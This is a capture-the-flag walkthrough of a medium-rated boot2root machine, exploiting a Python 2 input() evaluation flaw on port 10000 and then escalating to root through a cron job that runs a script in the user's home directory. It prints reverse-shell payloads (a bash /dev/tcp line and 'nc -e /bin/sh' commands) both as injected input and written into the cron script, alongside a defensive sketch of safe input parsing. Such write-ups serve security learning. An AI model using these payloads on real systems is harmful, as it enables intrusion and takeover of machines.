boot2root machine for FIT and bsides Guatemala CTF.

Not much to go on here. This one is Medium rated. Let’s begin.


Nmap says we’ve got two ports only - SSH on 22 and a mystery port on 10000.

Visiting port 10000 in Firefox presents the following message:

Private 0days
Please enter number of exploits to send??: Traceback (most recent call last):
  File "./", line 6, in
    num_exploits = int(input(' Please enther number of exploits to send??: '))
  File "", line 1, in
NameError: name 'GET' is not defined

So it looks like a Python application of some sort that we don’t interact with via a browser. We’ll move on to netcat.


root@kali:/opt/tryhackme/develpy# nc 10000

        Private 0days

 Please enther number of exploits to send??: 1

Exploit started, attacking target (
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.011 ms

So what’s going on here is we enter some number, and we get that number of pings. Now we have to break it.

Breaking it

I tried a few different things; some things produce this message as part of the error:

num_exploits = int(input(' Please enther number of exploits to send??: '))

So we can see the input value being read with input() and then cast to an integer with int() - actually we saw this earlier when we visited the port in the browser. Trying a few different data types produces more error messages, indicating it wants a string or integer as the expected input. After a bit I tried this:

__import__('os').system('bash -i >& /dev/tcp/ 0>&1')#

Which prompted this error:

sh: 1: Syntax error: Bad fd number

This indicated that the command was being executed by the system but not understood, because it was run by sh rather than bash. The next one I tried was:

__import__('os').system('nc -e /bin/sh 1234')

And I was on the box.
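
Why the payload above runs at all: under Python 2, input() evaluates the typed line as a Python expression before int() ever sees it. The sketch below is an added example, not code from the original page or from the target service; it models that behaviour with eval() under Python 3 next to a parser that treats the line purely as data. The function names, MAX_EXPLOITS and the sample inputs are assumptions constructed for illustration.

```python
import re

MAX_EXPLOITS = 100  # assumed upper bound; the real service's limit is unknown


def py2_input(line):
    """What Python 2's input() does with a line: eval() it as an expression."""
    return eval(line)  # deliberately unsafe, kept only to reproduce the bug


def vulnerable_parse(line):
    # Mirrors `num_exploits = int(input(...))` as it behaves under Python 2.
    return int(py2_input(line))


def safe_parse(line):
    """Treat the line as data: ASCII digits only, bounded, never evaluated."""
    text = line.strip()
    if not re.fullmatch(r"[0-9]{1,4}", text):
        raise ValueError("expected a whole number")
    value = int(text)
    if not 1 <= value <= MAX_EXPLOITS:
        raise ValueError("number out of range")
    return value


# Constructed inputs: a normal answer, a harmless expression standing in for
# injected code, and the browser request line behind the NameError on 'GET'.
SAMPLES = ["3", "__import__('os').getpid() * 0 + 7", "GET / HTTP/1.1"]


def compare(samples=SAMPLES):
    """Return (input, vulnerable result, safe result) for each sample."""
    rows = []
    for s in samples:
        out = []
        for fn in (vulnerable_parse, safe_parse):
            try:
                out.append(repr(fn(s)))
            except Exception as exc:
                out.append(type(exc).__name__)
        rows.append((s, out[0], out[1]))
    return rows


if __name__ == "__main__":
    for s, vuln, safe in compare():
        print(f"{s!r:40} vulnerable={vuln:10} safe={safe}")
```

The second sample returns a number from the vulnerable path, which means the expression ran inside the service before the int() cast; the safe path rejects it without evaluating anything.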

On the box

Our user is called king. Checking /etc/crontab we can see:

          • root cd /home/king/ && bash

So we have root running a script in our home directory. Nice. We can overwrite the script with our own - I deleted the original and replaced it:

king@ubuntu:~$ echo '#!/bin/bash' >>

king@ubuntu:~$ echo 'nc -e /bin/sh 1235' >>

Since we know this shell already works, we might as well use it again with a different port number, right? With a new listener we get a root shell and it’s all done; thanks for playing.